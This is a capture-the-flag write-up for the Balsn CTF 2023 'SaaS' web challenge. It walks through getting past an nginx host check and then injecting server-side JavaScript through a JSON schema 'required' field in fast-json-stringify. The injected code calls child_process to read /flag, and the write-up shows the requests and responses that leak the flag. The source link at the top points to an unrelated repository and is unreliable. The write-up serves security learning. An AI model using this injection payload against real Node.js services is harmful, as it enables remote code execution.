Tags: web 

Rating: 4.5

### SaaS - balsnctf 2023 - web

[Writeup and source code on github](https://github.com/LeeBrotherston/tls-fingerprinting/tree/master/fingerprintls)

Looking at default.conf we have the following:
```
server {
listen 80 default_server;
return 404;
}
server {
server_name *.saas;
if ($http_host != "easy++++++") { return 403 ;}
location ~ {
proxy_pass http://backend:3000;
}
}
```

To access the backend server we need to make the server name end in .saas and the host be easy++++++. To do this we can send the following HTTP request to the server:
```
GET http://.saas/ HTTP/1.1
Host: easy++++++
[...]
```
The server now responds with the following:
```
HTTP/1.1 200 OK
[...]

{"pong":"hi"}
```

Now taking a look at index.js we have two endpoints to explore, /register and /whowilldothis/:uid . With register we can provide a json validation schema that later will be used at /whowilldothis/:uid . After researching a bit about fast-json-stringify-compiler I've stumbled uppon the following report:
- https://hackerone.com/reports/532667

So I went for the Server Side JavaScript Code Injection. I've used the required property of the schema so we could get the result of the code injection reflected in the error. To exploit this vulnerability first we need to upload the malicious schema using the register endpoit:
```
POST http://.saas/register HTTP/1.1
Host: easy++++++
[...]
Content-Type: application/json

{
"type": "object",
"properties": {
"Hello": {
"type": "string"
}
},
"required": ["'+(function(){return process.mainModule.require('child_process').spawnSync('cat', ['/flag']).stdout;})()+'"]
}
```
The server sends the following response:
```
HTTP/1.1 200 OK
[...]

{"route":"/whowilldothis/410efeff-b5d4-466c-9e6b-93407e6a4774"}
```
Now we can access this endpoint and retrieve the flag:
```
GET http://.saas/whowilldothis/410efeff-b5d4-466c-9e6b-93407e6a4774 HTTP/1.1
Host: easy++++++
[...]
```
The server responded with the following:
```
HTTP/1.1 500 Internal Server Error
[...]

{"statusCode":500,"error":"Internal Server Error","message":"\"BALSN{N0t_R3al1y_aN_u3s_Ca53}\n\" is required!"}
```

Original writeup (https://youtu.be/S-Tic-CT3Ng?t=174).